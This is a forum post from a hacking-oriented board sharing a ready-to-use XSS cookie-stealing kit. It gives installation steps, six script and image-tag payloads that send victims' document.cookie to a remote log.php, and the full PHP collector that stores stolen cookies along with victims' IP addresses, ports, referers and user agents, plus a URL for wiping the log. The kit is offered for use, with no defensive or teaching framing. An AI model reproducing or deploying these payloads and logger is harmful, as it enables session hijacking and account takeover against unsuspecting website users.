Register for your free account! | Forgot your password?

You last visited: Today at 07:17

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



XSS Exploit

Discussion on XSS Exploit within the Coding Snippets forum part of the Coding Releases category.

Reply
 
Old   #1
 
SecurityFlaw's Avatar
 
elite*gold: 0
Join Date: Oct 2016
Posts: 2
Received Thanks: 0
XSS Exploit

instruction.txt ( ):
Code:
####################################################################################################
# Installation:
####################################################################################################
German: Laden sie den Inhalt aus dem Ordner "upload" auf ihr Webverzeichnis hoch!
English: Upload the content from the "upload" folder to your web directory!

####################################################################################################
# Payloads:
####################################################################################################
<img src="*" onerror="new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);" alt="" height="0" width="0" />
<script>document.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>location.href='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>var x = new Image();x.src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>window.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>

####################################################################################################
# Clear logs
####################################################################################################
http://own-server.net/test/log.php?clear=1
log.php ( ):
Code:
<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown"))
        $ip = $_SERVER["REMOTE_ADDR"];
    else
        $ip = "unknown";
    return ($ip);
}

function logData()
{
    $ipLog            = "data.log";
    $cookie           = $_SERVER["QUERY_STRING"];
    $register_globals = (bool) ini_get("register_gobals");
    if ($register_globals)
        $ip = getenv("REMOTE_ADDR");
    else
        $ip = GetIP();
    
    $rem_port    = $_SERVER["REMOTE_PORT"];
    $user_agent  = $_SERVER["HTTP_USER_AGENT"];
    $rqst_method = $_SERVER["REQUEST_METHOD"];
    $referer     = $_SERVER["HTTP_REFERER"];
    $date        = date("d.m.Y - H:i:s");
    $log         = fopen("$ipLog", "a+");
    
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "####################################################################################################<br /># Date{ : } $date<br /># Cookie: $cookie<br /># IP: $ip<br /># Port: $rem_port<br /># Request-Method: $rqst_method<br /># Referer: $referer<br /># User-Agent: $user_agent <br />####################################################################################################<br /><br />");
    else
        fputs($log, "####################################################################################################\n# Date: $date\n# Cookie: $cookie\n# IP: $ip\n# Port: $rem_port\n# Request-Method: $rqst_method\n# Referer: $referer\n# User-Agent: $user_agent\n####################################################################################################\n\n");
    fclose($log);
}

if (isset($_GET["cookie"]) && ($_GET["cookie"] != "")) {
    logData();
} else {
}

if (isset($_GET["clear"]) && ($_GET["clear"] == "1")) {
    $string = "";
    $fp     = fopen("data.log", "w");
    fwrite($fp, $string);
    fclose($fp);
} else {
}

exit();

?>
Download:
SecurityFlaw is offline  
Reply


Similar Threads Similar Threads
[Exploit] How To Exploit Garen Ult Mechanic For Extended Range
11/26/2011 - League of Legends - 9 Replies
How To Exploit Garen Ult Mechanic For Extended Range - YouTube not my Video, so dont thank me :)
Guild Vault Exploit/Gpromote Exploit (working on 3.0.3 servers)
01/12/2009 - WoW PServer Exploits, Hacks & Tools - 1 Replies
Credits go to powerget23 from MM0wned tested and confirmed, have fun XD



All times are GMT +1. The time now is 07:17.


Powered by vBulletin®
Copyright ©2000 - 2023, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2023 elitepvpers All Rights Reserved.